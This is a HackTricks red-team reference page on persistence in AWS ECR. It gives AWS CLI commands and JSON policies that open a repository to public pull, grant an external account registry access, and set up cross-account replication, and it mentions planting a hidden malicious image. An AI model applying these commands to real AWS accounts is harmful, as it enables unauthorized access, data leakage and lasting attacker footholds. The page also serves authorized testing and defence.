AWS - ECR Persistence

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

For more information check:

Hidden Docker Image with Malicious Code

An attacker could upload a Docker image containing malicious code to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.

Repository Policy

Add a policy to a single repository granting yourself (or everybody) access to a repository:

aws ecr set-repository-policy \
    --repository-name cluster-autoscaler \
    --policy-text file:///tmp/my-policy.json

# With a .json such as

{
    "Version" : "2008-10-17",
    "Statement" : [
        {
            "Sid" : "allow public pull",
            "Effect" : "Allow",
            "Principal" : "*",
            "Action" : [
                "ecr:BatchCheckLayerAvailability",
                "ecr:BatchGetImage",
                "ecr:GetDownloadUrlForLayer"
            ]
        }
    ]
}

Note that ECR requires that users have permission to make calls to the ecr:GetAuthorizationToken API through an IAM policy before they can authenticate to a registry and push or pull any images from any Amazon ECR repository.

Registry Policy & Cross-account Replication

It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to indicate the external account there you want to replicate the registry.

First, you need to give the external account access over the registry with a registry policy like:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
  "Sid": "asdasd",
  "Effect": "Allow",
  "Principal": {
    "AWS": "arn:aws:iam::947247140022:root"
  },
  "Action": [
    "ecr:CreateRepository",
    "ecr:ReplicateImage"
  ],
  "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

Then apply the replication config:

aws ecr put-replication-configuration \
     --replication-configuration file://replication-settings.json \
     --region us-west-2

# Having the .json a content such as:
{
	"rules": [{
		"destinations": [{
			"region": "destination_region",
			"registryId": "destination_accountId"
		}],
		"repositoryFilters": [{
			"filter": "repository_prefix_name",
			"filterType": "PREFIX_MATCH"
		}]
	}]
}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - EC2 Persistence NextAWS - ECS Persistence

Last updated 2 months ago